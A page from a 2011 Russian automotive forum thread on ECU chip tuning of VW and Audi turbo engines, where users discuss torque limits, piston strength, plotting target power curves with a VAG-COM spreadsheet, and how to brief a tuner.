+ Ответить в теме
Страница 24 из 81 ПерваяПервая ... 14 22 23 24 25 26 34 74 ... ПоследняяПоследняя
Показано с 231 по 240 из 809

Тема: чип vs чип (подход, особенности, проблемы и т.п.)

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Цитата Сообщение от Амет Посмотреть сообщение
    п.с. почему 6300 ? потому что выше не будет больше момента или потому что пружинки не выдерживают?
    ====
    Да потому что если продолжать держать полку после 6300 то нужны кованные поршни ибо мы вылезаем за безопасные 400лс.

Вообще, совет всем, скачайте с ваг-комовского сайта "channel 120 tutorial" и начинайте строить графики.
    Много-много вопросов сразу отпадёт

Добавлено через 3 минуты
    Вот что было-бы если держать полку ещё на 1000 оборотов (до 7300)

Добавлено через 7 минут
    http://www.ross-tech.net/vag-com/examples/Block_120_Tutorial.xls
    Последний раз редактировалось turborabbit; 15.09.2011 в 17:44. Причина: Добавлено сообщение

GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Машина
    A4 Allroad
    Цитата Сообщение от BON Посмотреть сообщение
    ну у меня просто тюнинг, р\вал с другими характеристиками.

Карбонизации не было в моторе ?
    Все было чисто.
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Машина
    BMW 330D Соляра Power
    А какова погрешность таких измерений?
    BMW 330D POWERED by Dizelboost :pepper:

Цитата Сообщение от inVENTOr Посмотреть сообщение
    А какова погрешность таких измерений?
    Измерений каких? Ты имеешь ввиду реальный график и такой нарисованный?
    Здесь имеется ввиду, что перед любым проектом ты сначала рисуешь свой график и приносишь чиповщику. А он тебе говорит что для этого надо купить, какое железо. Ты покупаешь и он настраивает так, чтобы результат соответствовал твоему рисунку:)
    2.0 TFSI/K04..

Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Машина
    BMW 330D Соляра Power
    чота я не вкурил, зачем рисовать график и нести его программисту?))))
    ну я нарисую чонить и он будет под мои каракули машину строить. . . както от обратного идем:):):)

чота я не вкурил, зачем рисовать график и нести его программисту?))))
    ну я нарисую чонить и он будет под мои каракули машину строить. . . както от обратного идем:):):)
    Ну а как ты сформулируешь ему то, что ты хочешь? Ведь просто "хочу 350 сил и 450 момента", это далеко не полная информация.
    Но в то же время одно дело просто нарисовать карандашом прямую от 1000 до 8000 оборотов, а другое дело взять програмку, которая рисует реальные графики, позволяя вводить переменные данные.
    Так и должно быть, и такой график будет как "проект" для строителя.
    2.0 TFSI/K04..

GTI-Racing Глум is on a distinguished road Аватар для Глум
    Машина
    Skoda vRS 3**hp
    Амет
    Конкретно IE шатуны идут под штатные пальцы-поршни и т.д. Все стоковое. Проверено мной 3 года назад и перепроверено АвтоПрагой 2 месяца назад:)
    Бери, не очкуй:)

Машина
    BMW 330D Соляра Power
    Цитата Сообщение от alex323-69 Посмотреть сообщение
    Ну а как ты сформулируешь ему то, что ты хочешь? Ведь просто "хочу 350 сил и 450 момента", это далеко не полная информация.
    Но в то же время одно дело просто нарисовать карандашом прямую от 1000 до 8000 оборотов, а другое дело взять програмку, которая рисует реальные графики, позволяя вводить переменные данные.
    Так и должно быть, и такой график будет как "проект" для строителя.
    Понял, интересный подход:)
    Обычно как ты и сказал, хочу вот стока, чо мне надо купить) ) )

Обычно как ты и сказал, хочу вот стока, чо мне надо купить) ) )
    Не, ну обычно тоже цифры говорим, но если спросять - в каком диапазоне оборотов например, то уже пожимаешь плечами:)
    2.0 TFSI/K04..

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Цитата Сообщение от alex323-69 Посмотреть сообщение
    перед любым проектом ты сначала рисуешь свой график и приносишь чиповщику. А он тебе говорит что для этого надо купить, какое железо. Ты покупаешь и он настраивает так, чтобы результат соответствовал твоему рисунку:)
    ====
    Именно так.
    Просто во первых не все помнят что момент и мощность жёстко связаны между собой и оборотами.
    Так вот такие экселики помогают хомячкам спустицца с небес и перестать мечтать о невозможном. Ибо народ начитавшись форумов начинает оперировать лошадьми и тоннами будто это говно за баней.
    А когда начинает появляться конкретная формулировка чего нужно, тогда начинает создавацца и список модификаций и бюджет.
    Это не выгодно лохотюнерам пытающимся впарить хомячкам ненужные железки. И это не выгодно лохотюнерам не уверенным в результате своих ковыряний отвёрткой в мозгах.
    Но это неотменная часть в постройке расово верных пепелацов.

Добавлено через 3 минуты
    хочу вот стока, чо мне надо купить) ) )
    ====
    Это подход новичка, на котором у лохотюнеров есть отличная возможность заработать.
    Но это очень мало говорит о реальном результате.
    Впрочем, если задача - напечатать красивый график, всунуть в рамочку и поставить в гараже/офисе/на серванте - то этот подход тоже неплох. НО для всего перечисленного обычно нужна 1/3 бюджета который запросят тюнеры.
    Последний раз редактировалось turborabbit; 15.09.2011 в 19:58. Причина: Добавлено сообщение

+ Ответить в теме
Страница 24 из 81 ПерваяПервая ... 14 22 23 24 25 26 34 74 ... ПоследняяПоследняя